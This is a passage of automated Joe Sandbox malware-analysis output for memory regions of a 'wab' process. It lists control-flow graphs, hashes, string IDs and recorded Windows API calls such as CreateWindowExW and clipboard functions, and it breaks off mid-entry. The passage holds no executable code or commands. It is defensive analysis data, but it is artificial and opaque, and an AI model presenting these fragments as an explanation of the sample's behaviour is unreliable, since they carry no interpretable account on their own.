                                                                          control_flow_graph 900 a79111-a79127 901 a79129-a7912c 900->901 902 a7912e-a79154 901->902 903 a79159-a7915c 901->903 902->903 904 a7915e-a79184 903->904 905 a79189-a7918c 903->905 904->905 907 a7918e-a791b4 905->907 908 a791b9-a791bc 905->908 907->908 909 a791be-a791e4 908->909 910 a791e9-a791ec 908->910 909->910 914 a791ee-a79214 910->914 915 a79219-a7921c 910->915 914->915 916 a7921e-a79244 915->916 917 a79249-a7924c 915->917 916->917 923 a7924e-a79274 917->923 924 a79279-a7927c 917->924 923->924 925 a7927e-a792a4 924->925 926 a792a9-a792ac 924->926 925->926 933 a792ae 926->933 934 a792b9-a792bc 926->934 1114 a792ae call a799a0 933->1114 1115 a792ae call a79990 933->1115 935 a792be-a792e4 934->935 936 a792e9-a792ec 934->936 935->936 943 a792ee-a79314 936->943 944 a79319-a7931c 936->944 940 a792b4 940->934 943->944 945 a7931e-a79344 944->945 946 a79349-a7934c 944->946 945->946 951 a7934e-a79374 946->951 952 a79379-a7937c 946->952 951->952 954 a7937e-a793a4 952->954 955 a793a9-a793ac 952->955 954->955 959 a793ae-a793d4 955->959 960 a793d9-a793dc 955->960 959->960 963 a793de-a79404 960->963 964 a79409-a7940c 960->964 963->964 969 a7940e-a79434 964->969 970 a79439-a7943c 964->970 969->970 973 a7943e-a79464 970->973 974 a79469-a7946c 970->974 973->974 979 a7946e-a79494 974->979 980 a79499-a7949c 974->980 979->980 983 a7949e-a794c4 980->983 984 a794c9-a794cc 980->984 983->984 989 a794ce-a794f4 984->989 990 a794f9-a794fc 984->990 989->990 993 a794fe-a79524 990->993 994 a79529-a7952c 990->994 993->994 999 a7952e-a79554 994->999 1000 a79559-a7955c 994->1000 999->1000 1003 a7955e-a79584 1000->1003 1004 a79589-a7958c 1000->1004 1003->1004 1009 a7958e-a795b4 1004->1009 1010 a795b9-a795bc 1004->1010 1009->1010 1013 a795be-a795e4 1010->1013 1014 a795e9-a795ec 1010->1014 1013->1014 1019 a795ee-a79614 1014->1019 1020 a79619-a7961c 1014->1020 1019->1020 1023 a7961e-a79644 1020->1023 1024 a79649-a7964c 1020->1024 1023->1024 1029 a7964e-a79674 1024->1029 1030 a79679-a7967c 1024->1030 1029->1030 1033 a7967e-a796a4 1030->1033 1034 a796a9-a796ac 1030->1034 1033->1034 1039 a796ae-a796d4 1034->1039 1040 a796d9-a796dc 1034->1040 1039->1040 1043 a796de-a79704 1040->1043 1044 a79709-a7970c 1040->1044 1043->1044 1049 a7970e-a79734 1044->1049 1050 a79739-a7973c 1044->1050 1049->1050 1053 a7973e-a79764 1050->1053 1054 a79769-a7976c 1050->1054 1053->1054 1059 a7976e-a79794 1054->1059 1060 a79799-a7979c 1054->1060 1059->1060 1063 a7979e-a797c4 1060->1063 1064 a797c9-a797cc 1060->1064 1063->1064 1069 a797ce-a797f4 1064->1069 1070 a797f9-a797fc 1064->1070 1069->1070 1073 a797fe-a79824 1070->1073 1074 a79829-a7982c 1070->1074 1073->1074 1079 a7982e-a79854 1074->1079 1080 a79859-a7985c 1074->1080 1079->1080 1083 a7985e-a79884 1080->1083 1084 a79889-a7988c 1080->1084 1083->1084 1089 a798a7-a798aa 1084->1089 1090 a7988e-a7989a 1084->1090 1093 a798c7-a798ca 1089->1093 1094 a798ac-a798c2 1089->1094 1111 a798a2 1090->1111 1099 a798cc-a798ce 1093->1099 1100 a798db-a798dd 1093->1100 1094->1093 1116 a798d0 call a7aa0b 1099->1116 1117 a798d0 call a7a968 1099->1117 1118 a798d0 call a7a958 1099->1118 1106 a798e4-a798e7 1100->1106 1107 a798df 1100->1107 1106->901 1110 a798ed-a798f3 1106->1110 1107->1106 1109 a798d6 1109->1100 1111->1089 1114->940 1115->940 1116->1109 1117->1109 1118->1109
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: <z"$z"
                                                                          • API String ID: 0-742603914
                                                                          • Opcode ID: 613c8bb49b86cd9ab0835e776e50b66e231c32dcd91763a033d47fdb37cf4c3b
                                                                          • Instruction ID: 138cce1783f3f4d7c47c2a6978c8f9626027ea9ba9d43a93bd4ad2a161c31cc9
                                                                          • Opcode Fuzzy Hash: 613c8bb49b86cd9ab0835e776e50b66e231c32dcd91763a033d47fdb37cf4c3b
                                                                          • Instruction Fuzzy Hash: 6F1263717442218FCB199B78D89462D73A2EBCA356F11CD2AF809CB355DE39DC878B81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1119 a7f548-a7f56a 1120 a7f56c-a7f56f 1119->1120 1121 a7f576-a7f578 1120->1121 1122 a7f571-a7f574 1120->1122 1124 a7f973-a7f9ae 1121->1124 1125 a7f57e 1121->1125 1122->1121 1123 a7f583-a7f586 1122->1123 1126 a7f594-a7f597 1123->1126 1127 a7f588-a7f58f 1123->1127 1148 a7f9c0 1124->1148 1149 a7f9b0-a7f9be 1124->1149 1125->1123 1129 a7f5ba-a7f5bd 1126->1129 1130 a7f599-a7f5b5 1126->1130 1127->1126 1131 a7f5e1-a7f5e4 1129->1131 1132 a7f5bf-a7f5dc 1129->1132 1130->1129 1133 a7f5e6-a7f5f7 1131->1133 1134 a7f5fc-a7f5ff 1131->1134 1132->1131 1133->1134 1138 a7f601-a7f61a call a77bf4 1134->1138 1139 a7f61f-a7f622 1134->1139 1138->1139 1143 a7f624-a7f63a 1139->1143 1144 a7f63f-a7f642 1139->1144 1143->1144 1146 a7f644-a7f649 1144->1146 1147 a7f64c-a7f64f 1144->1147 1146->1147 1152 a7f682-a7f685 1147->1152 1153 a7f651-a7f67d 1147->1153 1159 a7f9c8-a7f9dd 1148->1159 1149->1159 1155 a7f687-a7f69c 1152->1155 1156 a7f6a1-a7f6a4 1152->1156 1153->1152 1155->1156 1161 a7f6a6-a7f6fb 1156->1161 1162 a7f700-a7f703 1156->1162 1178 a7f9ef 1159->1178 1179 a7f9df-a7f9ed 1159->1179 1161->1162 1165 a7f705-a7f74d 1162->1165 1166 a7f752-a7f755 1162->1166 1165->1166 1168 a7f757-a7f767 1166->1168 1169 a7f76c-a7f76f 1166->1169 1168->1169 1171 a7f797-a7f79a 1169->1171 1172 a7f771-a7f792 1169->1172 1175 a7f7ad-a7f7b0 1171->1175 1176 a7f79c-a7f7a6 1171->1176 1172->1171 1181 a7f7b2-a7f7b9 1175->1181 1182 a7f7bc-a7f7bf 1175->1182 1192 a7f811-a7f832 1176->1192 1193 a7f7a8 1176->1193 1190 a7f9f7-a7fa37 1178->1190 1179->1190 1186 a7f7c1-a7f7d4 1182->1186 1187 a7f7db-a7f7de 1182->1187 1194 a7f7d6 1186->1194 1195 a7f7e0-a7f7e7 1186->1195 1187->1195 1196 a7f7ec-a7f7ef 1187->1196 1225 a7fa3f-a7fa72 1190->1225 1204 a7f837-a7f83a 1192->1204 1193->1175 1194->1187 1195->1196 1199 a7f7f1-a7f807 1196->1199 1200 a7f80c-a7f80f 1196->1200 1199->1200 1200->1192 1200->1204 1205 a7f852-a7f855 1204->1205 1206 a7f83c-a7f84d 1204->1206 1212 a7f857-a7f865 1205->1212 1213 a7f86a-a7f86d 1205->1213 1206->1205 1212->1213 1215 a7f86f-a7f873 1213->1215 1216 a7f87e-a7f880 1213->1216 1215->1124 1220 a7f879 1215->1220 1221 a7f887-a7f88a 1216->1221 1222 a7f882 1216->1222 1220->1216 1221->1120 1224 a7f890-a7f89f 1221->1224 1222->1221 1228 a7f8a5-a7f955 call a77bf4 1224->1228 1229 a7f95b-a7f970 1224->1229 1237 a7fa74-a7fa79 1225->1237 1238 a7fa7f 1225->1238 1228->1229 1229->1124 1237->1238 1241 a7fa80 1238->1241 1241->1241
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Teqq$Teqq
                                                                          • API String ID: 0-4106862103
                                                                          • Opcode ID: 71bee4eda10822d5300433df708b5ee237d691be11c5ed8ff4e15ea06a18a14f
                                                                          • Instruction ID: 6ea2ed50db91247ee04546ff5a276f325eacb4cc0a4490299ecf2b8935326062
                                                                          • Opcode Fuzzy Hash: 71bee4eda10822d5300433df708b5ee237d691be11c5ed8ff4e15ea06a18a14f
                                                                          • Instruction Fuzzy Hash: E9E16D35A002158FDF28DF68C99066DB7B2FF89311F208569E40AEB365CB75DD46CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2076 233d8d80-233d8db2 2077 233d8dd8-233d8df6 2076->2077 2078 233d8db4-233d8dd3 2076->2078 2083 233d8e0e-233d8e24 2077->2083 2084 233d8df8-233d8e00 2077->2084 2078->2077 2087 233d8e2f-233d8e31 2083->2087 2084->2083 2088 233d8e49-233d8eba 2087->2088 2089 233d8e33-233d8e3b 2087->2089 2099 233d8ebc-233d8edf 2088->2099 2100 233d8ee6-233d8f02 2088->2100 2089->2088 2099->2100 2105 233d8f2e-233d8f49 2100->2105 2106 233d8f04-233d8f27 2100->2106 2111 233d8f4b-233d8f6d 2105->2111 2112 233d8f74-233d8f8f 2105->2112 2106->2105 2111->2112 2117 233d8fba-233d96b7 2112->2117 2118 233d8f91-233d8fb3 2112->2118 2118->2117
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $qq$$qq
                                                                          • API String ID: 0-1516316326
                                                                          • Opcode ID: 940f2246779d306af9559729957772529d076312023b94f8f60129ba05f49649
                                                                          • Instruction ID: e64d8999df67692cb5248593c0e5fe792d053722857797012487b77ffe6e033e
                                                                          • Opcode Fuzzy Hash: 940f2246779d306af9559729957772529d076312023b94f8f60129ba05f49649
                                                                          • Instruction Fuzzy Hash: 26518071B4020A8FCF48DB34C990B6EB7F7AB88601F1088B9D419EB354EA34ED058BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2256 233d4799-233d47a6 2257 233d47a8-233d47c7 2256->2257 2258 233d47ca-233d47cc 2256->2258 2257->2258 2259 233d47ce-233d47d1 2258->2259 2260 233d47d3-233d47ed 2259->2260 2261 233d47f2-233d47f5 2259->2261 2260->2261 2262 233d47fb-233d48f3 2261->2262 2263 233d4ed4-233d4ed6 2261->2263 2281 233d48f9-233d4946 call 233d5051 2262->2281 2282 233d4976-233d497d 2262->2282 2265 233d4edd-233d4ee0 2263->2265 2266 233d4ed8 2263->2266 2265->2259 2267 233d4ee6-233d4ef3 2265->2267 2266->2265 2295 233d494c-233d4968 2281->2295 2283 233d4a01-233d4a0a 2282->2283 2284 233d4983-233d49f3 2282->2284 2283->2267 2301 233d49fe 2284->2301 2302 233d49f5 2284->2302 2298 233d496a 2295->2298 2299 233d4973 2295->2299 2298->2299 2299->2282 2301->2283 2302->2301
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: fvq$XPvq
                                                                          • API String ID: 0-899226535
                                                                          • Opcode ID: ec31d46bf489b26bbeefa6447cc2000bd5d059f736fd5fa7cb699d472ec1b637
                                                                          • Instruction ID: 5fc7a4898ff13fdaf6420e8fbbeb7d02066ccf1ba68f760347d04d177d793f66
                                                                          • Opcode Fuzzy Hash: ec31d46bf489b26bbeefa6447cc2000bd5d059f736fd5fa7cb699d472ec1b637
                                                                          • Instruction Fuzzy Hash: 52518D72F002089FDB049FA5C954BAEBBF6BF88710F208569E506AB395DE759D018B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2304 a79990-a799bb 2305 a799bd-a799c0 2304->2305 2306 a79a24-a79a27 2305->2306 2307 a799c2-a79a1f 2305->2307 2308 a79a8b-a79a8e 2306->2308 2309 a79a29-a79a86 2306->2309 2307->2306 2311 a79af2-a79af5 2308->2311 2312 a79a90-a79aed 2308->2312 2309->2308 2314 a79af7-a79b54 2311->2314 2315 a79b59-a79b5c 2311->2315 2312->2311 2314->2315 2316 a79bc0-a79bc3 2315->2316 2317 a79b5e-a79bbb 2315->2317 2322 a79c27-a79c2a 2316->2322 2323 a79bc5-a79c22 2316->2323 2317->2316 2326 a79c8e-a79c91 2322->2326 2327 a79c2c-a79c89 2322->2327 2323->2322 2331 a79cf5-a79cf8 2326->2331 2332 a79c93-a79cf0 2326->2332 2327->2326 2335 a79d53-a79d56 2331->2335 2336 a79cfa-a79d4e 2331->2336 2332->2331 2344 a79da8-a79dab 2335->2344 2345 a79d58-a79da3 2335->2345 2336->2335 2349 a79dfd-a79e00 2344->2349 2350 a79dad-a79df8 2344->2350 2345->2344 2355 a79e52-a79e55 2349->2355 2356 a79e02-a79e4d 2349->2356 2350->2349 2361 a79ea7-a79eaa 2355->2361 2362 a79e57-a79ea2 2355->2362 2356->2355 2372 a79efc-a79eff 2361->2372 2373 a79eac-a79ef7 2361->2373 2362->2361 2377 a79f51-a79f54 2372->2377 2378 a79f01-a79f4c 2372->2378 2373->2372 2383 a79fa6-a79fa9 2377->2383 2384 a79f56-a79fa1 2377->2384 2378->2377 2389 a79ffb-a79ffe 2383->2389 2390 a79fab-a79ff6 2383->2390 2384->2383 2400 a7a050-a7a053 2389->2400 2401 a7a000-a7a04b 2389->2401 2390->2389 2405 a7a0a5-a7a0a8 2400->2405 2406 a7a055-a7a0a0 2400->2406 2401->2400 2411 a7a103-a7a106 2405->2411 2412 a7a0aa-a7a0fe 2405->2412 2406->2405 2417 a7a170-a7a173 2411->2417 2418 a7a108-a7a113 2411->2418 2412->2411 2424 a7a1d7-a7a1da 2417->2424 2425 a7a175-a7a1d2 2417->2425 2431 a7a11d-a7a16b 2418->2431 2433 a7a23e-a7a241 2424->2433 2434 a7a1dc-a7a239 2424->2434 2425->2424 2431->2417 2440 a7a2a5-a7a2a8 2433->2440 2441 a7a243-a7a2a0 2433->2441 2434->2433 2446 a7a30c-a7a30f 2440->2446 2447 a7a2aa-a7a307 2440->2447 2441->2440 2452 a7a311-a7a368 2446->2452 2453 a7a36d-a7a370 2446->2453 2447->2446 2452->2453 2462 a7a372-a7a3c3 2453->2462 2463 a7a3c8-a7a3cb 2453->2463 2462->2463 2468 a7a423-a7a426 2463->2468 2469 a7a3cd-a7a41e 2463->2469 2474 a7a47e-a7a481 2468->2474 2475 a7a428-a7a479 2468->2475 2469->2468 2480 a7a483-a7a4d4 2474->2480 2481 a7a4d9-a7a4dc 2474->2481 2475->2474 2480->2481 2490 a7a534-a7a537 2481->2490 2491 a7a4de-a7a52f 2481->2491 2496 a7a58f-a7a592 2490->2496 2497 a7a539-a7a58a 2490->2497 2491->2490 2501 a7a594-a7a5e5 2496->2501 2502 a7a5ea-a7a5ed 2496->2502 2497->2496 2501->2502 2511 a7a645-a7a648 2502->2511 2512 a7a5ef-a7a640 2502->2512 2520 a7a6a0-a7a6a3 2511->2520 2521 a7a64a-a7a69b 2511->2521 2512->2511 2523 a7a6a5-a7a6f6 2520->2523 2524 a7a6fb-a7a6fe 2520->2524 2521->2520 2523->2524 2532 a7a756-a7a759 2524->2532 2533 a7a700-a7a751 2524->2533 2536 a7a7b1-a7a7b4 2532->2536 2537 a7a75b-a7a7ac 2532->2537 2533->2532 2545 a7a7b6-a7a807 2536->2545 2546 a7a80c-a7a80f 2536->2546 2537->2536 2545->2546 2555 a7a867-a7a869 2546->2555 2556 a7a811-a7a862 2546->2556 2558 a7a870-a7a873 2555->2558 2559 a7a86b 2555->2559 2556->2555 2558->2305 2566 a7a879-a7a880 2558->2566 2559->2558
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8uZ `uZ
                                                                          • API String ID: 0-4087915542
                                                                          • Opcode ID: a6f9d864c1e8d614d8290ad0568e0efb0ffce69c0700d0c6c73577b74793ff25
                                                                          • Instruction ID: 148b5c96e98e22de48392e6035918eafcdbe675e1695452f61128152bbde0723
                                                                          • Opcode Fuzzy Hash: a6f9d864c1e8d614d8290ad0568e0efb0ffce69c0700d0c6c73577b74793ff25
                                                                          • Instruction Fuzzy Hash: A6829F34B802248FDB68DF24D590AAE77B2FB89311F1285A9D816D7364DF399C42CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2590 a799a0-a799bb 2591 a799bd-a799c0 2590->2591 2592 a79a24-a79a27 2591->2592 2593 a799c2-a79a1f 2591->2593 2594 a79a8b-a79a8e 2592->2594 2595 a79a29-a79a86 2592->2595 2593->2592 2597 a79af2-a79af5 2594->2597 2598 a79a90-a79aed 2594->2598 2595->2594 2600 a79af7-a79b54 2597->2600 2601 a79b59-a79b5c 2597->2601 2598->2597 2600->2601 2602 a79bc0-a79bc3 2601->2602 2603 a79b5e-a79bbb 2601->2603 2608 a79c27-a79c2a 2602->2608 2609 a79bc5-a79c22 2602->2609 2603->2602 2612 a79c8e-a79c91 2608->2612 2613 a79c2c-a79c89 2608->2613 2609->2608 2617 a79cf5-a79cf8 2612->2617 2618 a79c93-a79cf0 2612->2618 2613->2612 2621 a79d53-a79d56 2617->2621 2622 a79cfa-a79d4e 2617->2622 2618->2617 2630 a79da8-a79dab 2621->2630 2631 a79d58-a79da3 2621->2631 2622->2621 2635 a79dfd-a79e00 2630->2635 2636 a79dad-a79df8 2630->2636 2631->2630 2641 a79e52-a79e55 2635->2641 2642 a79e02-a79e4d 2635->2642 2636->2635 2647 a79ea7-a79eaa 2641->2647 2648 a79e57-a79ea2 2641->2648 2642->2641 2658 a79efc-a79eff 2647->2658 2659 a79eac-a79ef7 2647->2659 2648->2647 2663 a79f51-a79f54 2658->2663 2664 a79f01-a79f4c 2658->2664 2659->2658 2669 a79fa6-a79fa9 2663->2669 2670 a79f56-a79fa1 2663->2670 2664->2663 2675 a79ffb-a79ffe 2669->2675 2676 a79fab-a79ff6 2669->2676 2670->2669 2686 a7a050-a7a053 2675->2686 2687 a7a000-a7a04b 2675->2687 2676->2675 2691 a7a0a5-a7a0a8 2686->2691 2692 a7a055-a7a0a0 2686->2692 2687->2686 2697 a7a103-a7a106 2691->2697 2698 a7a0aa-a7a0fe 2691->2698 2692->2691 2703 a7a170-a7a173 2697->2703 2704 a7a108-a7a113 2697->2704 2698->2697 2710 a7a1d7-a7a1da 2703->2710 2711 a7a175-a7a1d2 2703->2711 2717 a7a11d-a7a16b 2704->2717 2719 a7a23e-a7a241 2710->2719 2720 a7a1dc-a7a239 2710->2720 2711->2710 2717->2703 2726 a7a2a5-a7a2a8 2719->2726 2727 a7a243-a7a2a0 2719->2727 2720->2719 2732 a7a30c-a7a30f 2726->2732 2733 a7a2aa-a7a307 2726->2733 2727->2726 2738 a7a311-a7a368 2732->2738 2739 a7a36d-a7a370 2732->2739 2733->2732 2738->2739 2748 a7a372-a7a3c3 2739->2748 2749 a7a3c8-a7a3cb 2739->2749 2748->2749 2754 a7a423-a7a426 2749->2754 2755 a7a3cd-a7a41e 2749->2755 2760 a7a47e-a7a481 2754->2760 2761 a7a428-a7a479 2754->2761 2755->2754 2766 a7a483-a7a4d4 2760->2766 2767 a7a4d9-a7a4dc 2760->2767 2761->2760 2766->2767 2776 a7a534-a7a537 2767->2776 2777 a7a4de-a7a52f 2767->2777 2782 a7a58f-a7a592 2776->2782 2783 a7a539-a7a58a 2776->2783 2777->2776 2787 a7a594-a7a5e5 2782->2787 2788 a7a5ea-a7a5ed 2782->2788 2783->2782 2787->2788 2797 a7a645-a7a648 2788->2797 2798 a7a5ef-a7a640 2788->2798 2806 a7a6a0-a7a6a3 2797->2806 2807 a7a64a-a7a69b 2797->2807 2798->2797 2809 a7a6a5-a7a6f6 2806->2809 2810 a7a6fb-a7a6fe 2806->2810 2807->2806 2809->2810 2818 a7a756-a7a759 2810->2818 2819 a7a700-a7a751 2810->2819 2822 a7a7b1-a7a7b4 2818->2822 2823 a7a75b-a7a7ac 2818->2823 2819->2818 2831 a7a7b6-a7a807 2822->2831 2832 a7a80c-a7a80f 2822->2832 2823->2822 2831->2832 2841 a7a867-a7a869 2832->2841 2842 a7a811-a7a862 2832->2842 2844 a7a870-a7a873 2841->2844 2845 a7a86b 2841->2845 2842->2841 2844->2591 2852 a7a879-a7a880 2844->2852 2845->2844
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8uZ `uZ
                                                                          • API String ID: 0-4087915542
                                                                          • Opcode ID: e7a8a67b4830f4466df7cac1eace97cfc6c147b75c8c960ad86b2e54c675d2e3
                                                                          • Instruction ID: 844f06489f7b2a6164f20d6d476272150aea094d5fa1152024ece6056a2207b3
                                                                          • Opcode Fuzzy Hash: e7a8a67b4830f4466df7cac1eace97cfc6c147b75c8c960ad86b2e54c675d2e3
                                                                          • Instruction Fuzzy Hash: 70828F34B802258FDB68DF24D590AAE73B2FB89311F1285A9D816D7364DF399C42CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ('z"
                                                                          • API String ID: 0-2037438512
                                                                          • Opcode ID: 1ec008ef4a63faa6f370c4f910d7e5fcb776511f2f7873513279b52d0706a2c3
                                                                          • Instruction ID: e8db079cf81c0bfc36db4baad71a4ea4e2ed15e1b62fd80352e35e23bd12a672
                                                                          • Opcode Fuzzy Hash: 1ec008ef4a63faa6f370c4f910d7e5fcb776511f2f7873513279b52d0706a2c3
                                                                          • Instruction Fuzzy Hash: DAD19171B002199FCB15DB68C994AAEBBF2EF98311F24C469E809DB355DB34DC42CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 233C37E2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 80604049a279c28c7f28da0bc81f262c72be0f6c456869c5ed0105e960fad3d6
                                                                          • Instruction ID: f420d30154e20344ddfbb18fbe0aacf78d6e80a751ab7a33c08d882b105f5931
                                                                          • Opcode Fuzzy Hash: 80604049a279c28c7f28da0bc81f262c72be0f6c456869c5ed0105e960fad3d6
                                                                          • Instruction Fuzzy Hash: E751D0B1D003499FDB14CFA9C984ADEBBB1FF88310F24856AE819AB210D775A945CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 233C37E2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 229410bf94f037c6f9ddb70b5f08a463158b6f2826f80a412e62b79a706c9180
                                                                          • Instruction ID: cc0a9d99cedffa42f497940e03284b1d968696a441eed2d6017ae15c7da2a532
                                                                          • Opcode Fuzzy Hash: 229410bf94f037c6f9ddb70b5f08a463158b6f2826f80a412e62b79a706c9180
                                                                          • Instruction Fuzzy Hash: 9E51EEB0D003499FDB14CFA9C880ADEBBB1BF48310F24856AE819AB211D775A985CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 233C37E2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 0c0b6242156d36a36bddbaa0aca055c94dcfe99fbc09fb3e13e06f3da3ce842e
                                                                          • Instruction ID: 8f8d3af34a359b7a399b4df4bdac60236b8550207f9602528d04baf95b3f86da
                                                                          • Opcode Fuzzy Hash: 0c0b6242156d36a36bddbaa0aca055c94dcfe99fbc09fb3e13e06f3da3ce842e
                                                                          • Instruction Fuzzy Hash: DC41CFB1D003499FDB14CFA9C984ADEFBB5FF48310F24852AE819AB210D775A945CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 233C8269
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0
                                                                          • Opcode ID: 74c85550bffa3a247ee058a88cec51b4d2e5578fa9e3aa38f94c130d11172f75
                                                                          • Instruction ID: abae53ef78e65d3261ebea2c4212e8d512bb70e6f08dde7c0c23da59f05b8ac5
                                                                          • Opcode Fuzzy Hash: 74c85550bffa3a247ee058a88cec51b4d2e5578fa9e3aa38f94c130d11172f75
                                                                          • Instruction Fuzzy Hash: A9312BB9900745CFCB04DF89C488A9ABBF5FF88314F25C999E5199B321D734AA41CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard
                                                                          • String ID:
                                                                          • API String ID: 220874293-0
                                                                          • Opcode ID: 1d1f5637a23e22a7269c4d80ad9ede52d4b576fa102098e477f3ec8238bd1ee4
                                                                          • Instruction ID: 3fe5ca0d87d3ca465e1e10988e69f1f1ade9a96b6672a1e5e214ddd2645c4518
                                                                          • Opcode Fuzzy Hash: 1d1f5637a23e22a7269c4d80ad9ede52d4b576fa102098e477f3ec8238bd1ee4
                                                                          • Instruction Fuzzy Hash: 463101B0D01289DFDB10CFA9D984BCEBBF6AF48304F248499E505BB391CBB46A45CB55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871307238.00000000233C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233c0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard
                                                                          • String ID:
                                                                          • API String ID: 220874293-0
                                                                          • Opcode ID: c62154dd9c91d81938ad4becb03df116b2e8e721d92d06db99986a3e184d42aa
                                                                          • Instruction ID: a27eda9b67e7c50d5f311d3c9eed27331941f77a9c3469bfbb8bb92fdf813b4b
                                                                          • Opcode Fuzzy Hash: c62154dd9c91d81938ad4becb03df116b2e8e721d92d06db99986a3e184d42aa
